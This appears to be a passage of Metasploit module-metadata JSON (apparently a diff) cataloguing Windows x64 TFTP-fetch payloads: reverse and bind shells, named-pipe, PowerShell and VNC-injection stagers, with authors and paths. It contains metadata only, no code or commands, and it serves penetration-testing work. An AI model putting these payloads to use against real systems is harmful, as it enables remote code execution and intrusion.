"payload_cmd/windows/tftp/x64/peinject/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_named_pipe": { - "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_rc4": { - "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/pingback_reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/tftp/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/powershell_bind_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/windows/tftp/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/powershell_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/powershell_reverse_tcp_ssl": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/shell/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/shell/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/shell/bind_tcp_rc4": { - "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/shell/bind_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/shell/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/shell/reverse_tcp_rc4": { - "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/shell/reverse_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/shell_bind_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/tftp/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/shell_reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/tftp/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_rc4": { - "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 